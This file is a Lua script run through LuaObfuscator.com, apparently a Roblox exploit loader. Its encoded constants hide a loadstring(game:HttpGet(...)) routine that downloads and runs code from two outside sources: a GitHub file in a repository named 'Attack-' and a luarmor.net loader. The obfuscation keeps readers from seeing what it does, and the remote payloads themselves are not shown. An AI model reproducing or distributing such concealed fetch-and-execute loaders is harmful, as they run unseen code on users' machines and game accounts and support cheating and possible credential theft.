--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v88=0;while true do if (v88==0) then v19=v0(v3(v30,1,1));return "";end end else local v89=v2(v0(v30,16));if v19 then local v110=0;local v111;while true do if (v110==1) then return v111;end if (v110==0) then v111=v5(v89,v19);v19=nil;v110=1;end end else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=(v31/((5 -(880 -(282 + 595)))^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + 1)) ;return v90-(v90%(932 -(857 + 74))) ;else local v91=(570 -((2004 -(1523 + 114)) + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v91 + v91))>=v91) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;return (v36 * (364 -108)) + v35 ;end local function v23() local v37=0 + 0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(958 -(892 + 65))) then return (v41 * (16778281 -(68 + 997))) + (v40 * (66806 -(226 + (2562 -1518)))) + (v39 * (1114 -858)) + v38 ;end if (v37==0) then v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + (121 -(32 + 85)) ;v37=1 + 0 ;end end end local function v24() local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,792 -(368 + 423) ,79 -59 ) * ((954 -(802 + 150))^32)) + v42 ;local v46=v20(v43,80 -59 ,473 -(416 + 26) );local v47=((v20(v43,85 -53 )==(3 -2)) and  -(1 -0)) or (1 + 0) ;if (v46==(997 -((3809 -2894) + 82))) then if (v45==((258 + 180) -(145 + 293))) then return v47 * (0 -(0 -0)) ;else v46=1 + 0 ;v44=0 -(0 -0) ;end elseif (v46==(3234 -((1928 -(814 + 45)) + 118))) then return ((v45==((0 -0) -0)) and (v47 * ((1 -0)/0))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((1 + 0 + 1)^(92 -(15 + 25))))) ;end local function v25(v48) local v49=885 -((1023 -762) + 624) ;local v50;local v51;while true do if (v49==(1 -0)) then v50=v3(v16,v18,(v18 + v48) -(1081 -(1020 + 21 + 39)) );v18=v18 + v48 ;v49=1425 -(630 + (2181 -1388)) ;end if (v49==(6 -4)) then v51={};for v112=4 -3 , #v50 do v51[v112]=v2(v1(v3(v50,v112,v112)));end v49=2 + 1 ;end if (v49==(0 -0)) then v50=nil;if  not v48 then v48=v23();if (v48==(1747 -(760 + 987))) then return "";end end v49=1914 -(1789 + 124) ;end if (v49==((7 + 762) -(745 + 17 + 4))) then return v6(v51);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99,v100) local v101=(function() return 0;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (v101~=(0 -0)) then else local v118=(function() return 0 + 0 ;end)();while true do if (v118~=(241 -(187 + 54))) then else v92=(function() return 0;end)();v93=(function() return nil;end)();v118=(function() return 781 -(162 + 618) ;end)();end if (v118==1) then v101=(function() return 1;end)();break;end end end if (v101~=1) then else local v119=(function() return 0 + 0 ;end)();while true do if (v119==(0 + 0)) then local v123=(function() return 0 -0 ;end)();while true do if (v123==(0 -0)) then while true do if (v92~=(0 + 0)) then else v93=(function() return v94();end)();if (v95(v93, #":", #"<")==(1636 -(1373 + 263))) then local v178=(function() return 1000 -(451 + 549) ;end)();local v179=(function() return;end)();local v180=(function() return;end)();local v181=(function() return;end)();while true do if (v178==(1 + 2)) then if (v95(v180, #"-19", #"-19")== #":") then v181[ #".dev"]=(function() return v98[v181[ #"xnxx"]];end)();end v99[v100]=(function() return v181;end)();break;end if (v178~=1) then else local v186=(function() return 0;end)();while true do if (v186~=1) then else v178=(function() return 2;end)();break;end if (v186==0) then v181=(function() return {v96(),v96(),nil,nil};end)();if (v179==0) then local v191=(function() return 0 -0 ;end)();local v192=(function() return;end)();while true do if (v191==0) then v192=(function() return 1384 -(746 + 638) ;end)();while true do if (v192==0) then v181[ #"xxx"]=(function() return v96();end)();v181[ #"http"]=(function() return v96();end)();break;end end break;end end elseif (v179== #"}") then v181[ #"xnx"]=(function() return v97();end)();elseif (v179==(1 + 1)) then v181[ #"asd"]=(function() return v97() -((2 -0)^(357 -(218 + 123))) ;end)();elseif (v179~= #"xxx") then else local v197=(function() return 0;end)();local v198=(function() return;end)();while true do if ((1581 -(1535 + 46))~=v197) then else v198=(function() return 0;end)();while true do if (v198==(0 + 0)) then v181[ #"nil"]=(function() return v97() -((1 + 1)^(576 -(306 + 254))) ;end)();v181[ #"asd1"]=(function() return v96();end)();break;end end break;end end end v186=(function() return 1;end)();end end end if (v178==(0 + 0)) then local v187=(function() return 0 -0 ;end)();while true do if (0~=v187) then else v179=(function() return v95(v93,2, #"nil");end)();v180=(function() return v95(v93, #"0836",1473 -(899 + 568) );end)();v187=(function() return 1 + 0 ;end)();end if (v187~=(2 -1)) then else v178=(function() return 604 -(268 + 335) ;end)();break;end end end if (v178==2) then if (v95(v180, #"~", #"]")== #"~") then v181[292 -(60 + 230) ]=(function() return v98[v181[2]];end)();end if (v95(v180,2,2)== #"~") then v181[ #"19("]=(function() return v98[v181[ #"nil"]];end)();end v178=(function() return 3;end)();end end end break;end end return v92,v93,v94,v95,v96,v97,v98,v99,v100;end end end end end end end;end)();local v53=(function() return function(v102,v103,v104) local v105=(function() return 572 -(426 + 146) ;end)();local v106=(function() return;end)();while true do if (v105~=(0 + 0)) then else v106=(function() return 0;end)();while true do if ((1456 -(282 + 1174))~=v106) then else local v124=(function() return 0;end)();local v125=(function() return;end)();while true do if (v124~=(811 -(569 + 242))) then else v125=(function() return 0 -0 ;end)();while true do if (v125~=(0 + 0)) then else local v167=(function() return 0;end)();while true do if (v167==(1024 -(706 + 318))) then v102[v103-#"[" ]=(function() return v104();end)();return v102,v103,v104;end end end end break;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v67= #"}",v58 do local v68=(function() return 0;end)();local v69=(function() return;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if (1==v68) then v71=(function() return nil;end)();while true do if (1==v69) then if (v70== #">") then v71=(function() return v21()~=(1271 -(945 + 326)) ;end)();elseif (v70==2) then v71=(function() return v24();end)();elseif (v70== #"91(") then v71=(function() return v25();end)();end v59[v67]=(function() return v71;end)();break;end if (0==v69) then local v121=(function() return 0;end)();local v122=(function() return;end)();while true do if (v121~=(0 -0)) then else v122=(function() return 0 + 0 ;end)();while true do if ((700 -(271 + 429))~=v122) then else local v159=(function() return 0;end)();while true do if (1~=v159) then else v122=(function() return 1 + 0 ;end)();break;end if (v159==0) then v70=(function() return v21();end)();v71=(function() return nil;end)();v159=(function() return 1501 -(1408 + 92) ;end)();end end end if (v122==(1087 -(461 + 625))) then v69=(function() return 1289 -(993 + 295) ;end)();break;end end break;end end end end break;end if (v68==(0 + 0)) then v69=(function() return 0;end)();v70=(function() return nil;end)();v68=(function() return 1172 -(418 + 753) ;end)();end end end v57[ #"91("]=(function() return v21();end)();for v72= #" ",v23() do FlatIdent_39B0,Descriptor,v21,v20,v22,v23,v59,v54,v72=(function() return v52(FlatIdent_39B0,Descriptor,v21,v20,v22,v23,v59,v54,v72);end)();end for v73= #"[",v23() do v55,v73,v28=(function() return v53(v55,v73,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[1 + 1 ];local v66=v61[1 + (4 -2) ];return function(...) local v74=v64;local v75=v65;local v76=v66;local v77=v27;local v78=1 + 0 ;local v79= -(530 -(406 + 123));local v80={};local v81={...};local v82=v12("#",...) -(1770 -(1749 + 20)) ;local v83={};local v84={};for v107=(0 -0) + 0 ,v82 do if ((902<2325) and (v107>=v76)) then v80[v107-v76 ]=v81[v107 + (1323 -(1249 + 73)) ];else v84[v107]=v81[v107 + 1 + 0 ];end end local v85=(v82-v76) + ((2565 -1419) -(466 + 679)) ;local v86;local v87;while true do v86=v74[v78];v87=v86[2 -1 ];if (v87<=(25 -16)) then if (v87<=4) then if ((858<=2962) and (v87<=(1901 -(106 + 1794)))) then if ((v87>(0 + 0)) or (3946<1288)) then v84[v86[2]]={};else v84[v86[2]]=v63[v86[1 + 0 + 2 ]];end elseif ((v87<=((24 -19) -3)) or (3242==567)) then v84[v86[5 -3 ]]=v63[v86[117 -(4 + 110) ]];elseif ((v87>(587 -(57 + 527))) or (847>=1263)) then v84[v86[1429 -(41 + (2139 -(239 + 514))) ]]={};else local v148=103 -(17 + 86) ;local v149;while true do if (v148==0) then v149=v86[2 + 0 ];v84[v149]=v84[v149](v13(v84,v149 + (1 -0) ,v79));break;end end end elseif ((v87<=6) or (2253==1851)) then if (v87>(14 -9)) then v84[v86[2]]=v86[(60 + 109) -((1451 -(797 + 532)) + 44) ];else local v133=v86[2 -0 ];v84[v133]=v84[v133](v13(v84,v133 + (3 -(2 + 0)) ,v79));end elseif (v87<=(6 + 1)) then local v135=0 + 0 ;local v136;local v137;while true do if ((v135==1) or (2087>2372)) then v84[v136 + ((1 + 0) -0) ]=v137;v84[v136]=v137[v86[69 -(30 + 35) ]];break;end if (v135==(0 + 0)) then v136=v86[2];v137=v84[v86[1260 -(1043 + 214) ]];v135=1;end end elseif ((v87==(30 -22)) or (4445<4149)) then v78=v86[1215 -((758 -435) + (2091 -(373 + 829))) ];else local v151=v86[5 -3 ];local v152,v153=v77(v84[v151](v13(v84,v151 + 1 ,v86[583 -(361 + 219) ])));v79=(v153 + v151) -1 ;local v154=0;for v165=v151,v79 do local v166=320 -(53 + 267) ;while true do if (v166==(0 + 0)) then v154=v154 + (414 -(15 + 398)) ;v84[v165]=v152[v154];break;end end end end elseif (v87<=((1727 -(476 + 255)) -(18 + 964))) then if (v87<=11) then if ((v87>((1167 -(369 + 761)) -27)) or (1818==85)) then if (v84[v86[2 + 0 ]]==v86[4]) then v78=v78 + 1 ;else v78=v86[2 + 1 ];end else local v138=v86[852 -(20 + 830) ];local v139,v140=v77(v84[v138](v13(v84,v138 + 1 + 0 ,v86[3])));v79=(v140 + v138) -(127 -(116 + 10)) ;local v141=0;for v145=v138,v79 do local v146=0 + 0 + 0 ;while true do if ((630<2127) and (v146==(738 -(542 + 196)))) then v141=v141 + 1 ;v84[v145]=v139[v141];break;end end end end elseif (v87<=(25 -13)) then do return;end elseif ((v87==(4 + 9)) or (1938==2514)) then do return;end else local v156=0;local v157;local v158;while true do if ((4255>=55) and (v156==((1 -0) + 0))) then v84[v157 + (1 -0) ]=v158;v84[v157]=v158[v86[2 + 2 ]];break;end if (v156==0) then v157=v86[4 -2 ];v158=v84[v86[7 -4 ]];v156=1552 -(1126 + 425) ;end end end elseif (v87<=(421 -(118 + 287))) then if (v87>(58 -43)) then v78=v86[1124 -(118 + 1003) ];else v84[v86[5 -3 ]]();end elseif ((2999>1156) and (v87<=(394 -(142 + 235)))) then v84[v86[9 -(245 -(64 + 174)) ]]=v86[1 + 2 ];elseif (v87>(995 -(79 + 474 + 424))) then if ((2350>1155) and (v84[v86[3 -1 ]]==v86[4 + 0 ])) then v78=v78 + 1 + 0 ;else v78=v86[(2 -0) + 1 ];end else v84[v86[1 + (337 -(144 + 192)) ]]();end v78=v78 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034C3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F746C7265647A746C7265647A312D64726F69642F412Q7461636B2D2F6D61696E2F524541444D452E6D64034D3Q00682Q7470733A2Q2F6170692E6C7561726D6F722E6E65742F66696C65732F76342F6C6F61646572732F66633230353865646361363565333432613761316137396230623765623132372E6C756100154Q00047Q001206000100013Q00260B00010002000100010004103Q00020001001202000200023Q001202000300033Q002007000300030004001206000500054Q000A000300054Q000500023Q00022Q0012000200010001001202000200023Q001202000300033Q002007000300030004001206000500064Q000A000300054Q000500023Q00022Q00120002000100010004103Q001400010004103Q000200012Q000D3Q00017Q00",v9(),...);
